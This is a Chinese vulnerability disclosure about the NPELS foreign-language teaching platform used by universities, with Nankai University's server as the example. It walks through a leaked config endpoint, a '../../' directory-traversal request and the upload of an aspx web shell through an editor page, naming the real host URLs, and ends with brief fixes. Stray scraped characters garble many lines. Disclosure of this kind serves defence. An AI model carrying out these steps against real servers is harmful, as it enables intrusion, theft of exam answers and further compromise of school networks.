好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
s F8 C$ L8 i- d2 ^8 Q9 J S% o$ I
详细说明:
/ T: e, t- O& V& m& } . d0 V, |$ W( _
以南开大学的为例:
" Q+ {4 t+ X% [. I& k% W, u" U# \http://222.30.60.3/NPELS6 {. h& u8 |1 y( k
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
M) \# s. G0 Q8 T% n5 B p% a<setting name="Update_CommonSvr_CommonService" serializeAs="String">
/ s& @9 G( e: S6 C( p0 T! U2 R Y<value>http://222.30.60.3/NPELS/CommonService.asmx</value>6 @9 F3 O2 [. z9 P% U# t0 t
</setting>' ` z5 I. c, d8 \) T/ w1 U
及版本号# u2 Q5 o" O% {
<add key="TVersion" value="1, 0, 0, 2187">& \9 n" m$ _' t: Y0 h# A3 q
</add>9 t. a6 s- F% W: b; l! z
直接访问# T6 c. s" o2 u' B6 K* ?! c
http://222.30.60.3/NPELS/CommonService.asmx
+ a( [5 O8 Z. T1 z t使用GetTestClientFileList操作,直接 HTTP GET 列目录:
4 `% l( q$ U: x& F4 h: }http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187
7 C; b- N+ _7 g( ^: E% I进一步列目录(返回的网页很大,可以直接 wget 下来)- X3 I) v2 q* X0 X6 B; v
http://222.30.60.3/NPELS/CommonS ... List?version=../../ R E6 A& i/ d3 p
M3 k0 l: y1 e: Y. i) I9 y
发现6 u! y6 c/ F( i. F6 q3 r4 G ]5 j
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm* p/ a8 i" s1 s# \
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头( Z6 T3 W1 U6 C4 V/ P
上传后继续列目录找到木马地址直接访问即可
: V9 ?' b' D% ^9 i ? a8 [
0 Y u7 @: v0 w. J1 kOOXX
% e' ?% |" [$ D# ` t
6 v6 O" W! Z9 B* v! E& wGoogle "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
$ P+ V' H* c* H; o" K& k漏洞证明:
! T) U( K* c% Z4 w7 f) i ' }5 i6 p0 n! {- v# `6 G
列目录:. k8 i5 X( U& Z- v
http://222.30.60.3/NPELS/CommonS ... List?version=../../# j2 J* Z7 U' c8 I9 m/ g8 ~
文件上传:
% Z2 q/ B! m4 H8 j" ^( y% Bhttp://222.30.60.3/npelsv/editor/editor.htm
8 G* H* G# C* g+ A+ Q; c8 {
. g9 o* j/ A5 Z; Q, Z上传木马:
4 f" M/ Z# R' V" B4 ^3 K5 thttp://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
% X2 @5 x$ \6 z- ^6 E
7 u0 Z6 [6 |2 X0 R5 }修复方案:; d g M4 j9 U, G& q' C. g
好像考试系统必须使用 CommonService.asmx
; A% h1 r, z% M: H最好配置文件加密或者用别的方式不让它泄露出来
$ l( Z+ y Y1 R* T8 J并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样
& k& v) ]: N" k) M% X |